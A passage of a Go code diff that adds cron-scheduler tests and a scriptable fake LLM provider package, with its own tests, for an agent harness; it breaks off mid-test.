+			schedule: "*/10 * * * *",
+			from:     time.Date(2025, 4, 1, 9, 55, 0, 0, time.UTC),
+			want:     time.Date(2025, 4, 1, 10, 0, 0, 0, time.UTC),
+		},
+		{
+			name:     "every-10-minutes_on-exact-slot",
+			schedule: "*/10 * * * *",
+			from:     time.Date(2025, 4, 1, 10, 0, 0, 0, time.UTC),
+			want:     time.Date(2025, 4, 1, 10, 10, 0, 0, time.UTC),
+		},
+		{
+			name:     "specific-minute-and-hour",
+			schedule: "30 9 * * *",
+			from:     time.Date(2025, 7, 4, 9, 30, 1, 0, time.UTC),
+			want:     time.Date(2025, 7, 5, 9, 30, 0, 0, time.UTC),
+		},
+		{
+			name:     "specific-minute-and-hour_before-slot",
+			schedule: "30 9 * * *",
+			from:     time.Date(2025, 7, 4, 9, 29, 59, 0, time.UTC),
+			want:     time.Date(2025, 7, 4, 9, 30, 0, 0, time.UTC),
+		},
+		{
+			name:     "end-of-year-rollover",
+			schedule: "0 0 1 1 *",
+			from:     time.Date(2025, 12, 31, 23, 59, 0, 0, time.UTC),
+			want:     time.Date(2026, 1, 1, 0, 0, 0, 0, time.UTC),
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			got, err := NextRunTime(tc.schedule, tc.from)
+			if err != nil {
+				t.Fatalf("NextRunTime(%q, %v) unexpected error: %v", tc.schedule, tc.from, err)
+			}
+			if !got.Equal(tc.want) {
+				t.Fatalf("NextRunTime(%q, %v)\n  got  %v\n  want %v",
+					tc.schedule, tc.from, got, tc.want)
+			}
+		})
+	}
+}
+
+func TestNextRunTime_InvalidSchedule_ReturnsError(t *testing.T) {
+	badSchedules := []string{
+		"",
+		"invalid",
+		"* * * *",     // only 4 fields (need 5)
+		"* * * * * *", // 6 fields — not accepted by 5-field parser
+		"60 * * * *",  // minute out of range
+		"* 25 * * *",  // hour out of range
+	}
+	from := time.Date(2025, 1, 1, 0, 0, 0, 0, time.UTC)
+	for _, bad := range badSchedules {
+		t.Run(bad, func(t *testing.T) {
+			_, err := NextRunTime(bad, from)
+			if err == nil {
+				t.Fatalf("NextRunTime(%q) expected error, got nil", bad)
+			}
+		})
+	}
+}
+
+// TestNextRunTime_Idempotent confirms that calling NextRunTime twice with the
+// same inputs returns the same result (pure function, no hidden state).
+func TestNextRunTime_Idempotent(t *testing.T) {
+	schedule := "*/15 * * * *"
+	from := time.Date(2025, 5, 20, 13, 7, 0, 0, time.UTC)
+	a, err := NextRunTime(schedule, from)
+	if err != nil {
+		t.Fatalf("first call error: %v", err)
+	}
+	b, err := NextRunTime(schedule, from)
+	if err != nil {
+		t.Fatalf("second call error: %v", err)
+	}
+	if !a.Equal(b) {
+		t.Fatalf("NextRunTime is not idempotent: %v vs %v", a, b)
+	}
+}
+
+// TestNextRunTime_MonotonicSequence verifies that successive calls using the
+// previous result as the new 'from' produce strictly increasing times.
+func TestNextRunTime_MonotonicSequence(t *testing.T) {
+	schedule := "*/5 * * * *"
+	prev := time.Date(2025, 1, 1, 0, 0, 0, 0, time.UTC)
+	for i := 0; i < 10; i++ {
+		next, err := NextRunTime(schedule, prev)
+		if err != nil {
+			t.Fatalf("step %d NextRunTime error: %v", i, err)
+		}
+		if !next.After(prev) {
+			t.Fatalf("step %d: next %v is not after prev %v", i, next, prev)
+		}
+		prev = next
+	}
+}
+
+// ---------------------------------------------------------------------------
+// (b) fireJob-driven execution across N manual calls
+// ---------------------------------------------------------------------------
+
+// fireJobTracker collects the full sequence of UpdateJob calls so each
+// iteration's state can be inspected independently.
+type fireJobTracker struct {
+	mu          sync.Mutex
+	execUpdates []Execution // all UpdateExecution calls (both status transitions)
+	jobUpdates  []Job       // one per fireJob call
+}
+
+func (tr *fireJobTracker) store() *mockStore {
+	return &mockStore{
+		CreateExecutionFunc: func(_ context.Context, exec Execution) (Execution, error) {
+			return exec, nil
+		},
+		UpdateExecutionFunc: func(_ context.Context, exec Execution) error {
+			tr.mu.Lock()
+			tr.execUpdates = append(tr.execUpdates, exec)
+			tr.mu.Unlock()
+			return nil
+		},
+		UpdateJobFunc: func(_ context.Context, job Job) error {
+			tr.mu.Lock()
+			tr.jobUpdates = append(tr.jobUpdates, job)
+			tr.mu.Unlock()
+			return nil
+		},
+	}
+}
+
+// TestFireJob_NSequentialCallsAdvanceState fires a job N times and asserts:
+//   - exactly N execution pairs (running+success) are recorded, i.e. 2*N UpdateExecution calls
+//   - exactly N UpdateJob calls are recorded
+//   - each successive jobUpdate's LastRunAt is >= the previous one (monotonically non-decreasing)
+//   - each successive jobUpdate's NextRunAt is computed from the stored schedule and is
+//     strictly after the corresponding LastRunAt
+func TestFireJob_NSequentialCallsAdvanceState(t *testing.T) {
+	const N = 5
+	schedule := "*/5 * * * *"
+
+	tr := &fireJobTracker{}
+	store := tr.store()
+	executor := &mockExecutor{
+		ExecuteFunc: func(_ context.Context, _ Job) (string, error) {
+			return "output", nil
+		},
+	}
+
+	// Start clock at a minute boundary so NextRunTime results are easy to reason about.
+	baseTime := time.Date(2025, 1, 1, 12, 0, 0, 0, time.UTC)
+	clock := newMockClock(baseTime)
+
+	cfg := SchedulerConfig{
+		MaxConcurrent: 1,
+		Jitter:        JitterConfig{Enabled: false},
+	}
+	s := NewScheduler(store, executor, clock, cfg)
+	s.sleepFn = func(time.Duration) {} // no-op: jitter disabled but guard anyway
+
+	job := Job{
+		ID:         "sequential-fire-job",
+		Name:       "sequential-fire",
+		Schedule:   schedule,
+		ExecType:   ExecTypeShell,
+		ExecConfig: `{"command":"echo test"}`,
+		Status:     StatusActive,
+		TimeoutSec: 30,
+		NextRunAt:  baseTime.Add(5 * time.Minute),
+	}
+
+	// Pre-populate jitter cache.
+	s.mu.Lock()
+	s.jitterCache[jitterCacheKey(job.ID, job.Schedule)] = 0
+	s.mu.Unlock()
+
+	// Fire N times sequentially, advancing the mock clock by 5 minutes each time
+	// so each iteration has a distinct and predictable endTime.
+	for i := 0; i < N; i++ {
+		fireTime := baseTime.Add(time.Duration(i+1) * 5 * time.Minute)
+		clock.Set(fireTime)
+		s.fireJob(job)
+		s.wg.Wait() // ensure goroutine completes before next iteration
+	}
+
+	tr.mu.Lock()
+	execUpdates := make([]Execution, len(tr.execUpdates))
+	copy(execUpdates, tr.execUpdates)
+	jobUpdates := make([]Job, len(tr.jobUpdates))
+	copy(jobUpdates, tr.jobUpdates)
+	tr.mu.Unlock()
+
+	// --- Assertion 1: execution update count ---
+	// Each fireJob produces exactly 2 UpdateExecution calls: running then success.
+	if got := len(execUpdates); got != 2*N {
+		t.Fatalf("expected %d execution updates (2 per fireJob), got %d", 2*N, got)
+	}
+
+	// --- Assertion 2: job update count ---
+	if got := len(jobUpdates); got != N {
+		t.Fatalf("expected %d job updates (1 per fireJob), got %d", N, got)
+	}
+
+	// --- Assertion 3: execution status pairs ---
+	for i := 0; i < N; i++ {
+		running := execUpdates[2*i]
+		success := execUpdates[2*i+1]
+		if running.Status != ExecStatusRunning {
+			t.Errorf("iteration %d: first exec update should be running, got %q", i, running.Status)
+		}
+		if success.Status != ExecStatusSuccess {
+			t.Errorf("iteration %d: second exec update should be success, got %q", i, success.Status)
+		}
+	}
+
+	// --- Assertion 4: LastRunAt is monotonically non-decreasing ---
+	for i := 1; i < N; i++ {
+		prev := jobUpdates[i-1].LastRunAt
+		cur := jobUpdates[i].LastRunAt
+		if cur.Before(prev) {
+			t.Errorf("iteration %d: LastRunAt went backwards: %v < %v", i, cur, prev)
+		}
+	}
+
+	// --- Assertion 5: NextRunAt is correctly recomputed after each execution ---
+	// NextRunAt = NextRunTime(schedule, endTime) where endTime = clock.Now() at fire time.
+	for i, ju := range jobUpdates {
+		endTime := baseTime.Add(time.Duration(i+1) * 5 * time.Minute)
+		want, err := NextRunTime(schedule, endTime)
+		if err != nil {
+			t.Fatalf("iteration %d: NextRunTime error: %v", i, err)
+		}
+		if ju.NextRunAt.IsZero() {
+			t.Errorf("iteration %d: NextRunAt is zero", i)
+			continue
+		}
+		if !ju.NextRunAt.Equal(want) {
+			t.Errorf("iteration %d: NextRunAt = %v, want %v (endTime %v, schedule %q)",
+				i, ju.NextRunAt, want, endTime, schedule)
+		}
+	}
+
+	// --- Assertion 6: each NextRunAt is strictly after the corresponding LastRunAt ---
+	for i, ju := range jobUpdates {
+		if !ju.NextRunAt.After(ju.LastRunAt) {
+			t.Errorf("iteration %d: NextRunAt %v is not after LastRunAt %v",
+				i, ju.NextRunAt, ju.LastRunAt)
+		}
+	}
+}
+
+// TestFireJob_FailedExecution_DoesNotChangeNextRunAt verifies that on executor
+// failure the updated job's NextRunAt is still recomputed (P1 fix applies
+// regardless of success/failure — scheduler.go unconditionally sets it after
+// endTime is known; only a schedule parse error leaves it unchanged).
+func TestFireJob_FailedExecution_NextRunAtStillAdvanced(t *testing.T) {
+	var mu sync.Mutex
+	var jobUpdate Job
+
+	store := &mockStore{
+		CreateExecutionFunc: func(_ context.Context, exec Execution) (Execution, error) {
+			return exec, nil
+		},
+		UpdateExecutionFunc: func(_ context.Context, exec Execution) error { return nil },
+		UpdateJobFunc: func(_ context.Context, job Job) error {
+			mu.Lock()
+			jobUpdate = job
+			mu.Unlock()
+			return nil
+		},
+	}
+	executor := &mockExecutor{
+		ExecuteFunc: func(_ context.Context, _ Job) (string, error) {
+			return "", errTestFailure("executor failed deliberately")
+		},
+	}
+
+	fireTime := time.Date(2025, 2, 14, 8, 0, 0, 0, time.UTC)
+	clock := newMockClock(fireTime)
+	cfg := SchedulerConfig{MaxConcurrent: 1, Jitter: JitterConfig{Enabled: false}}
+	s := NewScheduler(store, executor, clock, cfg)
+	s.sleepFn = func(time.Duration) {}
+
+	schedule := "0 * * * *"
+	job := Job{
+		ID:         "fail-job",
+		Name:       "fail",
+		Schedule:   schedule,
+		ExecType:   ExecTypeShell,
+		ExecConfig: `{"command":"false"}`,
+		Status:     StatusActive,
+		NextRunAt:  fireTime, // stale — same as fire time
+	}
+	s.mu.Lock()
+	s.jitterCache[jitterCacheKey(job.ID, job.Schedule)] = 0
+	s.mu.Unlock()
+
+	s.fireJob(job)
+	s.wg.Wait()
+
+	mu.Lock()
+	got := jobUpdate
+	mu.Unlock()
+
+	want, err := NextRunTime(schedule, fireTime)
+	if err != nil {
+		t.Fatalf("NextRunTime: %v", err)
+	}
+	if got.NextRunAt.IsZero() {
+		t.Fatal("NextRunAt is zero after failed execution")
+	}
+	if !got.NextRunAt.Equal(want) {
+		t.Fatalf("NextRunAt = %v, want %v", got.NextRunAt, want)
+	}
+}
+
+// errTestFailure is a lightweight error for test use.
+type errTestFailure string
+
+func (e errTestFailure) Error() string { return string(e) }
+
+// TestFireJob_InvalidSchedule_NextRunAtLeftUnchanged verifies that when the
+// job's schedule cannot be parsed by NextRunTime, the UpdateJob call still
+// happens but NextRunAt is left at the original value (zero in this case).
+func TestFireJob_InvalidSchedule_NextRunAtLeftUnchanged(t *testing.T) {
+	var mu sync.Mutex
+	var jobUpdate Job
+	updated := false
+
+	store := &mockStore{
+		CreateExecutionFunc: func(_ context.Context, exec Execution) (Execution, error) {
+			return exec, nil
+		},
+		UpdateExecutionFunc: func(_ context.Context, exec Execution) error { return nil },
+		UpdateJobFunc: func(_ context.Context, job Job) error {
+			mu.Lock()
+			jobUpdate = job
+			updated = true
+			mu.Unlock()
+			return nil
+		},
+	}
+	executor := &mockExecutor{
+		ExecuteFunc: func(_ context.Context, _ Job) (string, error) {
+			return "ok", nil
+		},
+	}
+
+	fireTime := time.Date(2025, 1, 1, 0, 0, 0, 0, time.UTC)
+	clock := newMockClock(fireTime)
+	cfg := SchedulerConfig{MaxConcurrent: 1, Jitter: JitterConfig{Enabled: false}}
+	s := NewScheduler(store, executor, clock, cfg)
+	s.sleepFn = func(time.Duration) {}
+
+	// We can't add an invalid schedule via AddJob (it would error), so we
+	// pre-populate the jitter cache directly and call fireJob with a job
+	// whose Schedule field is intentionally invalid.
+	job := Job{
+		ID:         "bad-sched-job",
+		Name:       "bad-schedule",
+		Schedule:   "INVALID_SCHED",
+		ExecType:   ExecTypeShell,
+		ExecConfig: `{"command":"echo ok"}`,
+		Status:     StatusActive,
+	}
+	s.mu.Lock()
+	s.jitterCache[jitterCacheKey(job.ID, job.Schedule)] = 0
+	s.mu.Unlock()
+
+	s.fireJob(job)
+	s.wg.Wait()
+
+	mu.Lock()
+	defer mu.Unlock()
+
+	if !updated {
+		t.Fatal("expected UpdateJob to be called even with an invalid schedule")
+	}
+	// NextRunAt should remain zero because NextRunTime returned an error.
+	if !jobUpdate.NextRunAt.IsZero() {
+		t.Fatalf("expected NextRunAt to remain zero for invalid schedule, got %v", jobUpdate.NextRunAt)
+	}
+}

--- a/internal/fakeprovider/errors.go
+++ b/internal/fakeprovider/errors.go
@@ -1,0 +1,65 @@
+// Package fakeprovider provides a reusable fake implementation of
+// harness.Provider for use in tests. It supports scripted turns,
+// streaming, delays, hang/release, and thread-safe invocation recording.
+package fakeprovider
+
+import (
+	"errors"
+	"fmt"
+
+	"go-agent-harness/internal/harness"
+)
+
+// retryableStatusCodes is the set of HTTP status codes that are considered
+// retryable / fallback-eligible by the harness.
+var retryableStatusCodes = map[int]bool{
+	429: true,
+	500: true,
+	502: true,
+	503: true,
+	504: true,
+}
+
+// RetryableError wraps an existing error so that IsRetryable returns true.
+// If err is already a *harness.ProviderHTTPError with a retryable status code
+// this is a no-op wrapper; if not, it is wrapped in a synthetic
+// *harness.ProviderHTTPError with status 500 so IsRetryable recognises it.
+func RetryableError(err error) error {
+	var phe *harness.ProviderHTTPError
+	if errors.As(err, &phe) && retryableStatusCodes[phe.StatusCode] {
+		// Already retryable — return as-is.
+		return err
+	}
+	// Wrap in a 500 ProviderHTTPError so IsRetryable can detect it.
+	return &harness.ProviderHTTPError{
+		Provider:   "fake",
+		StatusCode: 500,
+		Body:       err.Error(),
+	}
+}
+
+// RateLimitError returns a *harness.ProviderHTTPError with status 429
+// and the given message as the body.  IsRetryable returns true for this error.
+func RateLimitError(msg string) error {
+	return &harness.ProviderHTTPError{
+		Provider:   "fake",
+		StatusCode: 429,
+		Body:       msg,
+	}
+}
+
+// GenericError returns a plain non-retryable error (a simple fmt.Errorf).
+// IsRetryable returns false for this error.
+func GenericError(msg string) error {
+	return fmt.Errorf("%s", msg)
+}
+
+// IsRetryable returns true when err is (or wraps) a *harness.ProviderHTTPError
+// whose StatusCode is one of the fallback-eligible codes: 429, 500, 502, 503, 504.
+func IsRetryable(err error) bool {
+	var phe *harness.ProviderHTTPError
+	if errors.As(err, &phe) {
+		return retryableStatusCodes[phe.StatusCode]
+	}
+	return false
+}

--- a/internal/fakeprovider/provider.go
+++ b/internal/fakeprovider/provider.go
@@ -1,0 +1,321 @@
+package fakeprovider
+
+import (
+	"context"
+	"sync"
+	"time"
+
+	"go-agent-harness/internal/harness"
+)
+
+// ExhaustedBehavior controls what Provider.Complete returns when all scripted
+// turns have been consumed.
+type ExhaustedBehavior int
+
+const (
+	// ExhaustEmpty returns a zero CompletionResult with a nil error (default).
+	ExhaustEmpty ExhaustedBehavior = iota
+	// ExhaustError returns a GenericError stating the provider is exhausted.
+	ExhaustError
+	// ExhaustRepeatLast repeats the last scripted turn indefinitely.
+	ExhaustRepeatLast
+)
+
+// Turn describes a single scripted response that Provider will return for one
+// Complete call.
+type Turn struct {
+	// Content is returned in CompletionResult.Content (non-streaming path).
+	Content string
+	// ToolCalls is returned in CompletionResult.ToolCalls.
+	ToolCalls []harness.ToolCall
+	// Deltas are emitted via req.Stream when the request is streaming.
+	Deltas []harness.CompletionDelta
+	// Usage is returned verbatim in CompletionResult.Usage.
+	Usage *harness.CompletionUsage
+	// Cost is returned verbatim in CompletionResult.Cost.
+	Cost *harness.CompletionCost
+	// CostUSD is returned verbatim in CompletionResult.CostUSD.
+	CostUSD *float64
+	// UsageStatus is returned verbatim in CompletionResult.UsageStatus.
+	UsageStatus harness.UsageStatus
+	// CostStatus is returned verbatim in CompletionResult.CostStatus.
+	CostStatus harness.CostStatus
+	// Error is returned as the Complete error for this turn.
+	Error error
+	// Delay is the duration to wait before returning.  Context-aware: if the
+	// context is cancelled during the delay, ctx.Err() is returned instead.
+	Delay time.Duration
+	// InterDeltaDelay is the pause inserted between streaming deltas.
+	// Context-aware: cancellation aborts the stream.
+	InterDeltaDelay time.Duration
+	// Hang causes Complete to block indefinitely (until Release() is called or
+	// the context is cancelled).
+	Hang bool
+}
+
+// Invocation records a single call to Complete for post-hoc assertions.
+type Invocation struct {
+	// Index is the zero-based turn index that was served (or -1 when exhausted).
+	Index int
+	// Request is the CompletionRequest received by Complete.
+	Request harness.CompletionRequest
+	// Streamed is true when req.Stream was non-nil.
+	Streamed bool
+	// StartedAt is when Complete was entered.
+	StartedAt time.Time
+	// ReturnedAt is when Complete returned.
+	ReturnedAt time.Time
+	// Err is the error returned by Complete (including ctx.Err() on cancel).
+	Err error
+}
+
+// Option is a functional option for Provider.
+type Option func(*Provider)
+
+// WithDefaultDelay sets a default delay applied to every turn that does not
+// specify its own Delay (i.e. Turn.Delay == 0).
+func WithDefaultDelay(d time.Duration) Option {
+	return func(p *Provider) { p.defaultDelay = d }
+}
+
+// WithExhaustedBehavior sets what happens when all scripted turns are consumed.
+func WithExhaustedBehavior(b ExhaustedBehavior) Option {
+	return func(p *Provider) { p.exhausted = b }
+}
+
+// WithName sets the provider name used in errors emitted by the fake.
+func WithName(name string) Option {
+	return func(p *Provider) { p.name = name }
+}
+
+// Provider is a fake implementation of harness.Provider backed by a
+// pre-scripted sequence of turns.  It is safe for concurrent use.
+type Provider struct {
+	mu           sync.Mutex
+	name         string
+	turns        []Turn
+	callIndex    int
+	invocations  []Invocation
+	defaultDelay time.Duration
+	exhausted    ExhaustedBehavior
+
+	// release is used to unblock Hang turns.  Allocated once and closed
+	// (idempotently via releaseOnce) on the first Release() call.
+	release     chan struct{}
+	releaseOnce sync.Once
+}
+
+// New creates a Provider with the given scripted turns and options.
+func New(turns []Turn, opts ...Option) *Provider {
+	p := &Provider{
+		name:    "fake",
+		turns:   turns,
+		release: make(chan struct{}),
+	}
+	for _, o := range opts {
+		o(p)
+	}
+	return p
+}
+
+// Complete implements harness.Provider.  It serves the next scripted turn,
+// applying delays and streaming as configured.
+func (p *Provider) Complete(ctx context.Context, req harness.CompletionRequest) (harness.CompletionResult, error) {
+	started := time.Now()
+
+	// Determine which turn to serve (under lock).
+	p.mu.Lock()
+	idx := p.callIndex
+	var turn Turn
+	var turnIdx int
+
+	switch {
+	case idx < len(p.turns):
+		turn = p.turns[idx]
+		turnIdx = idx
+		p.callIndex++
+	case p.exhausted == ExhaustRepeatLast && len(p.turns) > 0:
+		turn = p.turns[len(p.turns)-1]
+		turnIdx = len(p.turns) - 1
+		p.callIndex++
+	case p.exhausted == ExhaustError:
+		p.callIndex++
+		p.mu.Unlock()
+		err := GenericError("fakeprovider: all scripted turns exhausted")
+		inv := Invocation{
+			Index:      -1,
+			Request:    req,
+			Streamed:   req.Stream != nil,
+			StartedAt:  started,
+			ReturnedAt: time.Now(),
+			Err:        err,
+		}
+		p.mu.Lock()
+		p.invocations = append(p.invocations, inv)
+		p.mu.Unlock()
+		return harness.CompletionResult{}, err
+	default:
+		// ExhaustEmpty — return zero result, nil error.
+		p.callIndex++
+		p.mu.Unlock()
+		inv := Invocation{
+			Index:      -1,
+			Request:    req,
+			Streamed:   req.Stream != nil,
+			StartedAt:  started,
+			ReturnedAt: time.Now(),
+			Err:        nil,
+		}
+		p.mu.Lock()
+		p.invocations = append(p.invocations, inv)
+		p.mu.Unlock()
+		return harness.CompletionResult{}, nil
+	}
+	p.mu.Unlock()
+
+	// Hang: block until release channel is closed or context is cancelled.
+	if turn.Hang {
+		p.mu.Lock()
+		relCh := p.release
+		p.mu.Unlock()
+		select {
+		case <-ctx.Done():
+			err := ctx.Err()
+			p.recordInvocation(Invocation{
+				Index:      turnIdx,
+				Request:    req,
+				Streamed:   req.Stream != nil,
+				StartedAt:  started,
+				ReturnedAt: time.Now(),
+				Err:        err,
+			})
+			return harness.CompletionResult{}, err
+		case <-relCh:
+			// Released — fall through to normal return path.
+		}
+	}
+
+	// Per-turn delay (or default).
+	delay := turn.Delay
+	if delay == 0 {
+		delay = p.defaultDelay
+	}
+	if delay > 0 {
+		select {
+		case <-ctx.Done():
+			err := ctx.Err()
+			p.recordInvocation(Invocation{
+				Index:      turnIdx,
+				Request:    req,
+				Streamed:   req.Stream != nil,
+				StartedAt:  started,
+				ReturnedAt: time.Now(),
+				Err:        err,
+			})
+			return harness.CompletionResult{}, err
+		case <-time.After(delay):
+		}
+	}
+
+	// Streaming: emit deltas via req.Stream.
+	if req.Stream != nil && len(turn.Deltas) > 0 {
+		for _, delta := range turn.Deltas {
+			if turn.InterDeltaDelay > 0 {
+				select {
+				case <-ctx.Done():
+					err := ctx.Err()
+					p.recordInvocation(Invocation{
+						Index:      turnIdx,
+						Request:    req,
+						Streamed:   true,
+						StartedAt:  started,
+						ReturnedAt: time.Now(),
+						Err:        err,
+					})
+					return harness.CompletionResult{}, err
+				case <-time.After(turn.InterDeltaDelay):
+				}
+			}
+			req.Stream(delta)
+		}
+	}
+
+	// Build result.
+	result := harness.CompletionResult{
+		Content:     turn.Content,
+		ToolCalls:   turn.ToolCalls,
+		Usage:       turn.Usage,
+		Cost:        turn.Cost,
+		CostUSD:     turn.CostUSD,
+		UsageStatus: turn.UsageStatus,
+		CostStatus:  turn.CostStatus,
+	}
+
+	returnedErr := turn.Error
+	p.recordInvocation(Invocation{
+		Index:      turnIdx,
+		Request:    req,
+		Streamed:   req.Stream != nil,
+		StartedAt:  started,
+		ReturnedAt: time.Now(),
+		Err:        returnedErr,
+	})
+
+	return result, returnedErr
+}
+
+// Calls returns the total number of Complete invocations so far.
+func (p *Provider) Calls() int {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	return p.callIndex
+}
+
+// Invocations returns a copy of the recorded invocation log.
+func (p *Provider) Invocations() []Invocation {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	out := make([]Invocation, len(p.invocations))
+	copy(out, p.invocations)
+	return out
+}
+
+// LastRequest returns the most recent CompletionRequest received, and whether
+// any call has been made at all.
+func (p *Provider) LastRequest() (harness.CompletionRequest, bool) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	if len(p.invocations) == 0 {
+		return harness.CompletionRequest{}, false
+	}
+	return p.invocations[len(p.invocations)-1].Request, true
+}
+
+// Release unblocks any currently-hanging Complete call (idempotent).
+// It closes the internal release channel, so subsequent Hang turns will
+// also return immediately unless Reset is called.
+func (p *Provider) Release() {
+	p.releaseOnce.Do(func() {
+		close(p.release)
+	})
+}
+
+// Reset rewinds the call index and clears the invocation log so the Provider
+// can be reused from the beginning.  It also allocates a fresh release channel
+// so that Hang turns work again.
+func (p *Provider) Reset() {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	p.callIndex = 0
+	p.invocations = nil
+	// Replace the release channel and once so Hang turns work again.
+	p.release = make(chan struct{})
+	p.releaseOnce = sync.Once{}
+}
+
+// recordInvocation appends an Invocation to the log under the mutex.
+func (p *Provider) recordInvocation(inv Invocation) {
+	p.mu.Lock()
+	p.invocations = append(p.invocations, inv)
+	p.mu.Unlock()
+}

--- a/internal/fakeprovider/provider_test.go
+++ b/internal/fakeprovider/provider_test.go
@@ -1,0 +1,510 @@
+package fakeprovider_test
+
+import (
+	"context"
+	"errors"
+	"sync"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+)
+
+// ---------------------------------------------------------------------------
+// helpers
+// ---------------------------------------------------------------------------
+
+func simpleRequest() harness.CompletionRequest {
+	return harness.CompletionRequest{Model: "fake-model"}
+}
+
+func streamingRequest(cb func(harness.CompletionDelta)) harness.CompletionRequest {
+	return harness.CompletionRequest{Model: "fake-model", Stream: cb}
+}
+
+// ---------------------------------------------------------------------------
+// Basic scripted turns
+// ---------------------------------------------------------------------------
+
+func TestProvider_SingleTurn_Content(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{
+		{Content: "hello world"},
+	})
+	result, err := p.Complete(context.Background(), simpleRequest())
+	require.NoError(t, err)
+	assert.Equal(t, "hello world", result.Content)
+	assert.Equal(t, 1, p.Calls())
+}
+
+func TestProvider_SingleTurn_ToolCalls(t *testing.T) {
+	t.Parallel()
+	tc := harness.ToolCall{ID: "tc-1", Name: "my_tool", Arguments: `{"x":1}`}
+	p := fakeprovider.New([]fakeprovider.Turn{
+		{ToolCalls: []harness.ToolCall{tc}},
+	})
+	result, err := p.Complete(context.Background(), simpleRequest())
+	require.NoError(t, err)
+	require.Len(t, result.ToolCalls, 1)
+	assert.Equal(t, tc, result.ToolCalls[0])
+}
+
+func TestProvider_MultipleTurns_ServedInOrder(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{
+		{Content: "first"},
+		{Content: "second"},
+		{Content: "third"},
+	})
+	ctx := context.Background()
+	for _, want := range []string{"first", "second", "third"} {
+		res, err := p.Complete(ctx, simpleRequest())
+		require.NoError(t, err)
+		assert.Equal(t, want, res.Content)
+	}
+	assert.Equal(t, 3, p.Calls())
+}
+
+// ---------------------------------------------------------------------------
+// Usage / Cost pass-through
+// ---------------------------------------------------------------------------
+
+func TestProvider_UsageAndCostPassThrough(t *testing.T) {
+	t.Parallel()
+	usd := 0.0042
+	p := fakeprovider.New([]fakeprovider.Turn{{
+		Content: "done",
+		Usage: &harness.CompletionUsage{
+			PromptTokens:     100,
+			CompletionTokens: 50,
+			TotalTokens:      150,
+		},
+		Cost: &harness.CompletionCost{
+			TotalUSD: usd,
+		},
+		CostUSD:     &usd,
+		UsageStatus: harness.UsageStatusProviderReported,
+		CostStatus:  harness.CostStatusAvailable,
+	}})
+	res, err := p.Complete(context.Background(), simpleRequest())
+	require.NoError(t, err)
+	require.NotNil(t, res.Usage)
+	assert.Equal(t, 100, res.Usage.PromptTokens)
+	assert.Equal(t, 50, res.Usage.CompletionTokens)
+	assert.Equal(t, 150, res.Usage.TotalTokens)
+	require.NotNil(t, res.Cost)
+	assert.InDelta(t, 0.0042, res.Cost.TotalUSD, 1e-9)
+	require.NotNil(t, res.CostUSD)
+	assert.InDelta(t, 0.0042, *res.CostUSD, 1e-9)
+	assert.Equal(t, harness.UsageStatusProviderReported, res.UsageStatus)
+	assert.Equal(t, harness.CostStatusAvailable, res.CostStatus)
+}
+
+// ---------------------------------------------------------------------------
+// Turn error
+// ---------------------------------------------------------------------------
+
+func TestProvider_TurnError_IsReturned(t *testing.T) {
+	t.Parallel()
+	sentinel := errors.New("something went wrong")
+	p := fakeprovider.New([]fakeprovider.Turn{
+		{Error: sentinel},
+	})
+	_, err := p.Complete(context.Background(), simpleRequest())
+	assert.ErrorIs(t, err, sentinel)
+	assert.Equal(t, 1, p.Calls())
+}
+
+// ---------------------------------------------------------------------------
+// Streaming
+// ---------------------------------------------------------------------------
+
+func TestProvider_Streaming_DeltasEmitted(t *testing.T) {
+	t.Parallel()
+	deltas := []harness.CompletionDelta{
+		{Content: "part1"},
+		{Content: "part2"},
+		{Content: "part3"},
+	}
+	p := fakeprovider.New([]fakeprovider.Turn{
+		{Deltas: deltas, Content: "full"},
+	})
+
+	var got []harness.CompletionDelta
+	req := streamingRequest(func(d harness.CompletionDelta) {
+		got = append(got, d)
+	})
+	res, err := p.Complete(context.Background(), req)
+	require.NoError(t, err)
+	assert.Equal(t, "full", res.Content)
+	require.Len(t, got, 3)
+	for i, d := range deltas {
+		assert.Equal(t, d, got[i])
+	}
+}
+
+func TestProvider_Streaming_InterDeltaDelay_ContextCancel(t *testing.T) {
+	t.Parallel()
+	deltas := []harness.CompletionDelta{{Content: "a"}, {Content: "b"}, {Content: "c"}}
+	p := fakeprovider.New([]fakeprovider.Turn{
+		{Deltas: deltas, InterDeltaDelay: 200 * time.Millisecond},
+	})
+
+	ctx, cancel := context.WithTimeout(context.Background(), 50*time.Millisecond)
+	defer cancel()
+
+	var mu sync.Mutex
+	var received []harness.CompletionDelta
+	req := streamingRequest(func(d harness.CompletionDelta) {
+		mu.Lock()
+		received = append(received, d)
+		mu.Unlock()
+	})
+	_, err := p.Complete(ctx, req)
+	assert.ErrorIs(t, err, context.DeadlineExceeded)
+	// Only the first delta (before first inter-delta delay) may have been emitted.
+	mu.Lock()
+	n := len(received)
+	mu.Unlock()
+	assert.LessOrEqual(t, n, 1, "should not have streamed many deltas before cancel")
+}
+
+// ---------------------------------------------------------------------------
+// Per-turn delay
+// ---------------------------------------------------------------------------
+
+func TestProvider_TurnDelay_ContextCancel(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{
+		{Content: "slow", Delay: 500 * time.Millisecond},
+	})
+	ctx, cancel := context.WithTimeout(context.Background(), 50*time.Millisecond)
+	defer cancel()
+	_, err := p.Complete(ctx, simpleRequest())
+	assert.ErrorIs(t, err, context.DeadlineExceeded)
+}
+
+func TestProvider_DefaultDelay_Applied(t *testing.T) {
+	t.Parallel()
+	// Use a very short default delay and confirm the call takes at least that long.
+	d := 20 * time.Millisecond
+	p := fakeprovider.New([]fakeprovider.Turn{{Content: "x"}}, fakeprovider.WithDefaultDelay(d))
+	start := time.Now()
+	_, err := p.Complete(context.Background(), simpleRequest())
+	elapsed := time.Since(start)
+	require.NoError(t, err)
+	assert.GreaterOrEqual(t, elapsed, d)
+}
+
+func TestProvider_DefaultDelay_ContextCancel(t *testing.T) {
+	t.Parallel()
+	p := fakeprovider.New([]fakeprovider.Turn{{Content: "x"}},
